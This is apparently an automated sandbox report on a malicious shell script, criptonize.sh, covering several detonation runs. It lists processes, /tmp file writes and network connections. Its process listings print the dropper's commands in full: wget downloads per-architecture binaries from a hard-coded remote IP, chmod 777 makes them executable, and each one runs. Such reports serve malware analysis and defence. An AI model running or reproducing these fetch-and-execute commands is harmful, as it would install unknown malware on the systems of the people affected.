Analysis Overview
SHA256
5231c1a078c018a6abea6fadde67300a961c9b528743464806246a3be619b405
Threat Level: Likely malicious
The file criptonize.sh was found to be: Likely malicious.
Malicious Activity Summary
Writes memory of remote process
Loads a kernel module
Checks CPU configuration
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-27 23:47
Signatures
Analysis: behavioral6
Detonation Overview
Submitted
2024-08-27 23:47
Reported
2024-08-27 23:47
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
29s
Max time network
30s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/criptonize.mips64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4tl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv5l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i686 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i486 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4eb | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.aarch64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mipsel | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.powerpc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv7l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv6l | /usr/bin/wget | N/A |
Processes
/tmp/criptonize.sh
[/tmp/criptonize.sh]
/bin/rm
[rm -f criptonize.x86_64]
/usr/bin/wget
[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]
/bin/chmod
[chmod 777 criptonize.x86_64]
/tmp/criptonize.x86_64
[./criptonize.x86_64 x86_64]
/bin/rm
[rm -f criptonize.x86_64]
/bin/rm
[rm -f criptonize.i686]
/usr/bin/wget
[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]
/bin/chmod
[chmod 777 criptonize.i686]
/tmp/criptonize.i686
[./criptonize.i686 i686]
/bin/rm
[rm -f criptonize.i686]
/bin/rm
[rm -f criptonize.i586]
/usr/bin/wget
[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]
/bin/chmod
[chmod 777 criptonize.i586]
/tmp/criptonize.i586
[./criptonize.i586 i586]
/bin/rm
[rm -f criptonize.i586]
/bin/rm
[rm -f criptonize.i486]
/usr/bin/wget
[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]
/bin/chmod
[chmod 777 criptonize.i486]
/tmp/criptonize.i486
[./criptonize.i486 i486]
/bin/rm
[rm -f criptonize.i486]
/bin/rm
[rm -f criptonize.aarch64]
/usr/bin/wget
[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]
/bin/chmod
[chmod 777 criptonize.aarch64]
/tmp/criptonize.aarch64
[./criptonize.aarch64 aarch64]
/bin/rm
[rm -f criptonize.aarch64]
/bin/rm
[rm -f criptonize.armv7l]
/usr/bin/wget
[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]
/bin/chmod
[chmod 777 criptonize.armv7l]
/tmp/criptonize.armv7l
[./criptonize.armv7l armv7l]
/bin/rm
[rm -f criptonize.armv7l]
/bin/rm
[rm -f criptonize.armv6l]
/usr/bin/wget
[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]
/bin/chmod
[chmod 777 criptonize.armv6l]
/tmp/criptonize.armv6l
[./criptonize.armv6l armv6l]
/bin/rm
[rm -f criptonize.armv6l]
/bin/rm
[rm -f criptonize.armv5l]
/usr/bin/wget
[wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l]
/bin/chmod
[chmod 777 criptonize.armv5l]
/tmp/criptonize.armv5l
[./criptonize.armv5l armv5l]
/bin/rm
[rm -f criptonize.armv5l]
/bin/rm
[rm -f criptonize.armv4eb]
/usr/bin/wget
[wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]
/bin/chmod
[chmod 777 criptonize.armv4eb]
/tmp/criptonize.armv4eb
[./criptonize.armv4eb armv4eb]
/bin/rm
[rm -f criptonize.armv4eb]
/bin/rm
[rm -f criptonize.armv4tl]
/usr/bin/wget
[wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]
/bin/chmod
[chmod 777 criptonize.armv4tl]
/tmp/criptonize.armv4tl
[./criptonize.armv4tl armv4tl]
/bin/rm
[rm -f criptonize.armv4tl]
/bin/rm
[rm -f criptonize.armv4l]
/usr/bin/wget
[wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l]
/bin/chmod
[chmod 777 criptonize.armv4l]
/tmp/criptonize.armv4l
[./criptonize.armv4l armv4l]
/bin/rm
[rm -f criptonize.armv4l]
/bin/rm
[rm -f criptonize.mips64]
/usr/bin/wget
[wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64]
/bin/chmod
[chmod 777 criptonize.mips64]
/tmp/criptonize.mips64
[./criptonize.mips64 mips64]
/bin/rm
[rm -f criptonize.mips64]
/bin/rm
[rm -f criptonize.mips]
/usr/bin/wget
[wget -O criptonize.mips http://212.60.5.174/criptonize.mips]
/bin/chmod
[chmod 777 criptonize.mips]
/tmp/criptonize.mips
[./criptonize.mips mips]
/bin/rm
[rm -f criptonize.mips]
/bin/rm
[rm -f criptonize.mipsel]
/usr/bin/wget
[wget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel]
/bin/chmod
[chmod 777 criptonize.mipsel]
/tmp/criptonize.mipsel
[./criptonize.mipsel mipsel]
/bin/rm
[rm -f criptonize.mipsel]
/bin/rm
[rm -f criptonize.powerpc]
/usr/bin/wget
[wget -O criptonize.powerpc http://212.60.5.174/criptonize.powerpc]
Network
| Country | Destination | Domain | Proto |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| US | 151.101.1.91:443 | | tcp |
| US | 151.101.1.91:443 | | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| GB | 195.181.164.14:443 | | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-08-27 23:47
Reported
2024-08-27 23:47
Platform
ubuntu2004-amd64-20240508-en
Max time kernel
27s
Max time network
32s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/criptonize.armv4eb | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mips64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.arc700 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.powerpc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.sparc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i486 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.aarch64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv7l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv5l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv6l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4tl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i686 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mipsel | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.bsdamd64 | /usr/bin/wget | N/A |
Processes
/tmp/criptonize.sh
[/tmp/criptonize.sh]
/usr/bin/rm
[rm -f criptonize.x86_64]
/usr/bin/wget
[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]
/usr/bin/chmod
[chmod 777 criptonize.x86_64]
/tmp/criptonize.x86_64
[./criptonize.x86_64 x86_64]
/usr/bin/rm
[rm -f criptonize.x86_64]
/usr/bin/rm
[rm -f criptonize.i686]
/usr/bin/wget
[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]
/usr/bin/chmod
[chmod 777 criptonize.i686]
/tmp/criptonize.i686
[./criptonize.i686 i686]
/usr/bin/rm
[rm -f criptonize.i686]
/usr/bin/rm
[rm -f criptonize.i586]
/usr/bin/wget
[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]
/usr/bin/chmod
[chmod 777 criptonize.i586]
/tmp/criptonize.i586
[./criptonize.i586 i586]
/usr/bin/rm
[rm -f criptonize.i586]
/usr/bin/rm
[rm -f criptonize.i486]
/usr/bin/wget
[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]
/usr/bin/chmod
[chmod 777 criptonize.i486]
/tmp/criptonize.i486
[./criptonize.i486 i486]
/usr/bin/rm
[rm -f criptonize.i486]
/usr/bin/rm
[rm -f criptonize.aarch64]
/usr/bin/wget
[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]
/usr/bin/chmod
[chmod 777 criptonize.aarch64]
/tmp/criptonize.aarch64
[./criptonize.aarch64 aarch64]
/usr/bin/rm
[rm -f criptonize.aarch64]
/usr/bin/rm
[rm -f criptonize.armv7l]
/usr/bin/wget
[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]
/usr/bin/chmod
[chmod 777 criptonize.armv7l]
/tmp/criptonize.armv7l
[./criptonize.armv7l armv7l]
/usr/bin/rm
[rm -f criptonize.armv7l]
/usr/bin/rm
[rm -f criptonize.armv6l]
/usr/bin/wget
[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]
/usr/bin/chmod
[chmod 777 criptonize.armv6l]
/tmp/criptonize.armv6l
[./criptonize.armv6l armv6l]
/usr/bin/rm
[rm -f criptonize.armv6l]
/usr/bin/rm
[rm -f criptonize.armv5l]
/usr/bin/wget
[wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l]
/usr/bin/chmod
[chmod 777 criptonize.armv5l]
/tmp/criptonize.armv5l
[./criptonize.armv5l armv5l]
/usr/bin/rm
[rm -f criptonize.armv5l]
/usr/bin/rm
[rm -f criptonize.armv4eb]
/usr/bin/wget
[wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]
/usr/bin/chmod
[chmod 777 criptonize.armv4eb]
/tmp/criptonize.armv4eb
[./criptonize.armv4eb armv4eb]
/usr/bin/rm
[rm -f criptonize.armv4eb]
/usr/bin/rm
[rm -f criptonize.armv4tl]
/usr/bin/wget
[wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]
/usr/bin/chmod
[chmod 777 criptonize.armv4tl]
/tmp/criptonize.armv4tl
[./criptonize.armv4tl armv4tl]
/usr/bin/rm
[rm -f criptonize.armv4tl]
/usr/bin/rm
[rm -f criptonize.armv4l]
/usr/bin/wget
[wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l]
/usr/bin/chmod
[chmod 777 criptonize.armv4l]
/tmp/criptonize.armv4l
[./criptonize.armv4l armv4l]
/usr/bin/rm
[rm -f criptonize.armv4l]
/usr/bin/rm
[rm -f criptonize.mips64]
/usr/bin/wget
[wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64]
/usr/bin/chmod
[chmod 777 criptonize.mips64]
/tmp/criptonize.mips64
[./criptonize.mips64 mips64]
/usr/bin/rm
[rm -f criptonize.mips64]
/usr/bin/rm
[rm -f criptonize.mips]
/usr/bin/wget
[wget -O criptonize.mips http://212.60.5.174/criptonize.mips]
/usr/bin/chmod
[chmod 777 criptonize.mips]
/tmp/criptonize.mips
[./criptonize.mips mips]
/usr/bin/rm
[rm -f criptonize.mips]
/usr/bin/rm
[rm -f criptonize.mipsel]
/usr/bin/wget
[wget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel]
/usr/bin/chmod
[chmod 777 criptonize.mipsel]
/tmp/criptonize.mipsel
[./criptonize.mipsel mipsel]
/usr/bin/rm
[rm -f criptonize.mipsel]
/usr/bin/rm
[rm -f criptonize.powerpc]
/usr/bin/wget
[wget -O criptonize.powerpc http://212.60.5.174/criptonize.powerpc]
/usr/bin/chmod
[chmod 777 criptonize.powerpc]
/tmp/criptonize.powerpc
[./criptonize.powerpc powerpc]
/usr/bin/rm
[rm -f criptonize.powerpc]
/usr/bin/rm
[rm -f criptonize.m68k]
/usr/bin/wget
[wget -O criptonize.m68k http://212.60.5.174/criptonize.m68k]
/usr/bin/chmod
[chmod 777 criptonize.m68k]
/tmp/criptonize.m68k
[./criptonize.m68k m68k]
/usr/bin/rm
[rm -f criptonize.m68k]
/usr/bin/rm
[rm -f criptonize.sh4]
/usr/bin/wget
[wget -O criptonize.sh4 http://212.60.5.174/criptonize.sh4]
/usr/bin/chmod
[chmod 777 criptonize.sh4]
/tmp/criptonize.sh4
[./criptonize.sh4 sh4]
/usr/bin/rm
[rm -f criptonize.sh4]
/usr/bin/rm
[rm -f criptonize.sparc]
/usr/bin/wget
[wget -O criptonize.sparc http://212.60.5.174/criptonize.sparc]
/usr/bin/chmod
[chmod 777 criptonize.sparc]
/tmp/criptonize.sparc
[./criptonize.sparc sparc]
/usr/bin/rm
[rm -f criptonize.sparc]
/usr/bin/rm
[rm -f criptonize.arc700]
/usr/bin/wget
[wget -O criptonize.arc700 http://212.60.5.174/criptonize.arc700]
/usr/bin/chmod
[chmod 777 criptonize.arc700]
/tmp/criptonize.arc700
[./criptonize.arc700 arc700]
/usr/bin/rm
[rm -f criptonize.arc700]
/usr/bin/rm
[rm -f criptonize.bsdamd64]
/usr/bin/wget
[wget -O criptonize.bsdamd64 http://212.60.5.174/criptonize.bsdamd64]
/usr/bin/chmod
[chmod 777 criptonize.bsdamd64]
/tmp/criptonize.bsdamd64
[./criptonize.bsdamd64 bsdamd64]
/usr/bin/rm
[rm -f criptonize.bsdamd64]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-08-27 23:47
Reported
2024-08-27 23:47
Platform
ubuntu2204-amd64-20240611-en
Max time kernel
29s
Max time network
29s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/criptonize.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv6l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mips64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.aarch64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv7l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv5l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4eb | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4tl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i486 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mipsel | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i686 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4l | /usr/bin/wget | N/A |
Processes
/tmp/criptonize.sh
[/tmp/criptonize.sh]
/usr/bin/rm
[rm -f criptonize.x86_64]
/usr/bin/wget
[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]
/usr/bin/chmod
[chmod 777 criptonize.x86_64]
/tmp/criptonize.x86_64
[./criptonize.x86_64 x86_64]
/usr/bin/rm
[rm -f criptonize.x86_64]
/usr/bin/rm
[rm -f criptonize.i686]
/usr/bin/wget
[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]
/usr/bin/chmod
[chmod 777 criptonize.i686]
/tmp/criptonize.i686
[./criptonize.i686 i686]
/usr/bin/rm
[rm -f criptonize.i686]
/usr/bin/rm
[rm -f criptonize.i586]
/usr/bin/wget
[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]
/usr/bin/chmod
[chmod 777 criptonize.i586]
/tmp/criptonize.i586
[./criptonize.i586 i586]
/usr/bin/rm
[rm -f criptonize.i586]
/usr/bin/rm
[rm -f criptonize.i486]
/usr/bin/wget
[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]
/usr/bin/chmod
[chmod 777 criptonize.i486]
/tmp/criptonize.i486
[./criptonize.i486 i486]
/usr/bin/rm
[rm -f criptonize.i486]
/usr/bin/rm
[rm -f criptonize.aarch64]
/usr/bin/wget
[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]
/usr/bin/chmod
[chmod 777 criptonize.aarch64]
/tmp/criptonize.aarch64
[./criptonize.aarch64 aarch64]
/usr/bin/rm
[rm -f criptonize.aarch64]
/usr/bin/rm
[rm -f criptonize.armv7l]
/usr/bin/wget
[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]
/usr/bin/chmod
[chmod 777 criptonize.armv7l]
/tmp/criptonize.armv7l
[./criptonize.armv7l armv7l]
/usr/bin/rm
[rm -f criptonize.armv7l]
/usr/bin/rm
[rm -f criptonize.armv6l]
/usr/bin/wget
[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]
/usr/bin/chmod
[chmod 777 criptonize.armv6l]
/tmp/criptonize.armv6l
[./criptonize.armv6l armv6l]
/usr/bin/rm
[rm -f criptonize.armv6l]
/usr/bin/rm
[rm -f criptonize.armv5l]
/usr/bin/wget
[wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l]
/usr/bin/chmod
[chmod 777 criptonize.armv5l]
/tmp/criptonize.armv5l
[./criptonize.armv5l armv5l]
/usr/bin/rm
[rm -f criptonize.armv5l]
/usr/bin/rm
[rm -f criptonize.armv4eb]
/usr/bin/wget
[wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]
/usr/bin/chmod
[chmod 777 criptonize.armv4eb]
/tmp/criptonize.armv4eb
[./criptonize.armv4eb armv4eb]
/usr/bin/rm
[rm -f criptonize.armv4eb]
/usr/bin/rm
[rm -f criptonize.armv4tl]
/usr/bin/wget
[wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]
/usr/bin/chmod
[chmod 777 criptonize.armv4tl]
/tmp/criptonize.armv4tl
[./criptonize.armv4tl armv4tl]
/usr/bin/rm
[rm -f criptonize.armv4tl]
/usr/bin/rm
[rm -f criptonize.armv4l]
/usr/bin/wget
[wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l]
/usr/bin/chmod
[chmod 777 criptonize.armv4l]
/tmp/criptonize.armv4l
[./criptonize.armv4l armv4l]
/usr/bin/rm
[rm -f criptonize.armv4l]
/usr/bin/rm
[rm -f criptonize.mips64]
/usr/bin/wget
[wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64]
/usr/bin/chmod
[chmod 777 criptonize.mips64]
/tmp/criptonize.mips64
[./criptonize.mips64 mips64]
/usr/bin/rm
[rm -f criptonize.mips64]
/usr/bin/rm
[rm -f criptonize.mips]
/usr/bin/wget
[wget -O criptonize.mips http://212.60.5.174/criptonize.mips]
/usr/bin/chmod
[chmod 777 criptonize.mips]
/tmp/criptonize.mips
[./criptonize.mips mips]
/usr/bin/rm
[rm -f criptonize.mips]
/usr/bin/rm
[rm -f criptonize.mipsel]
/usr/bin/wget
[wget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-08-27 23:47
Reported
2024-08-27 23:47
Platform
debian9-mipsel-20240729-en
Max time kernel
30s
Max time network
31s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/criptonize.i686 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i486 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.aarch64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4eb | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mips64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv7l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv6l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv5l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4tl | /usr/bin/wget | N/A |
Processes
/tmp/criptonize.sh
[/tmp/criptonize.sh]
/bin/rm
[rm -f criptonize.x86_64]
/usr/bin/wget
[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]
/bin/chmod
[chmod 777 criptonize.x86_64]
/tmp/criptonize.x86_64
[./criptonize.x86_64 x86_64]
/bin/rm
[rm -f criptonize.x86_64]
/bin/rm
[rm -f criptonize.i686]
/usr/bin/wget
[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]
/bin/chmod
[chmod 777 criptonize.i686]
/tmp/criptonize.i686
[./criptonize.i686 i686]
/bin/rm
[rm -f criptonize.i686]
/bin/rm
[rm -f criptonize.i586]
/usr/bin/wget
[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]
/bin/chmod
[chmod 777 criptonize.i586]
/tmp/criptonize.i586
[./criptonize.i586 i586]
/bin/rm
[rm -f criptonize.i586]
/bin/rm
[rm -f criptonize.i486]
/usr/bin/wget
[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]
/bin/chmod
[chmod 777 criptonize.i486]
/tmp/criptonize.i486
[./criptonize.i486 i486]
/bin/rm
[rm -f criptonize.i486]
/bin/rm
[rm -f criptonize.aarch64]
/usr/bin/wget
[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]
/bin/chmod
[chmod 777 criptonize.aarch64]
/tmp/criptonize.aarch64
[./criptonize.aarch64 aarch64]
/bin/rm
[rm -f criptonize.aarch64]
/bin/rm
[rm -f criptonize.armv7l]
/usr/bin/wget
[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]
/bin/chmod
[chmod 777 criptonize.armv7l]
/tmp/criptonize.armv7l
[./criptonize.armv7l armv7l]
/bin/rm
[rm -f criptonize.armv7l]
/bin/rm
[rm -f criptonize.armv6l]
/usr/bin/wget
[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]
/bin/chmod
[chmod 777 criptonize.armv6l]
/tmp/criptonize.armv6l
[./criptonize.armv6l armv6l]
/bin/rm
[rm -f criptonize.armv6l]
/bin/rm
[rm -f criptonize.armv5l]
/usr/bin/wget
[wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l]
/bin/chmod
[chmod 777 criptonize.armv5l]
/tmp/criptonize.armv5l
[./criptonize.armv5l armv5l]
/bin/rm
[rm -f criptonize.armv5l]
/bin/rm
[rm -f criptonize.armv4eb]
/usr/bin/wget
[wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]
/bin/chmod
[chmod 777 criptonize.armv4eb]
/tmp/criptonize.armv4eb
[./criptonize.armv4eb armv4eb]
/bin/rm
[rm -f criptonize.armv4eb]
/bin/rm
[rm -f criptonize.armv4tl]
/usr/bin/wget
[wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]
/bin/chmod
[chmod 777 criptonize.armv4tl]
/tmp/criptonize.armv4tl
[./criptonize.armv4tl armv4tl]
/bin/rm
[rm -f criptonize.armv4tl]
/bin/rm
[rm -f criptonize.armv4l]
/usr/bin/wget
[wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l]
/bin/chmod
[chmod 777 criptonize.armv4l]
/tmp/criptonize.armv4l
[./criptonize.armv4l armv4l]
/bin/rm
[rm -f criptonize.armv4l]
/bin/rm
[rm -f criptonize.mips64]
/usr/bin/wget
[wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64]
/bin/chmod
[chmod 777 criptonize.mips64]
/tmp/criptonize.mips64
[./criptonize.mips64 mips64]
/bin/rm
[rm -f criptonize.mips64]
/bin/rm
[rm -f criptonize.mips]
Network
| Country | Destination | Domain | Proto |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-08-27 23:47
Reported
2024-08-27 23:48
Platform
debian9-armhf-20240611-en
Max time kernel
28s
Max time network
48s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/criptonize.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.aarch64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mipsel | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv7l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4eb | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mips64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i686 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i486 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv6l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv5l | /usr/bin/wget | N/A |
